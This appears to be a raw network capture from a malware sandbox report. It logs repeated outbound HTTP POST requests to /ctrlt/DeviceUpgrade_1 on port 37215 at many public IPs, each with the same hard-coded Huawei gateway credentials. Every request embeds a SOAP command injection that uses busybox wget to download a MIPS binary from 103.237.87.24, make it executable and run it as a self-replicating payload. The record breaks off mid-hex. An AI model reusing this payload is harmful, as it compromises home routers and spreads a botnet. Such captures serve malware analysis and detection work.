                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  30192.168.2.1335408157.76.143.15337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.055720091 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  31192.168.2.1351846132.29.29.2837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.055720091 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  32192.168.2.1346466125.127.51.24337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.055720091 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  33192.168.2.134151041.111.160.14537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.055726051 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  34192.168.2.1339878151.61.242.3037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.055752993 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  35192.168.2.1338412197.78.100.21737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.059475899 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  36192.168.2.1336456197.202.2.25037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.059475899 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  37192.168.2.134527840.164.86.24737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.059509993 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  38192.168.2.135545841.102.206.24337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.059533119 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  39192.168.2.1356232197.83.47.21837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.059533119 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 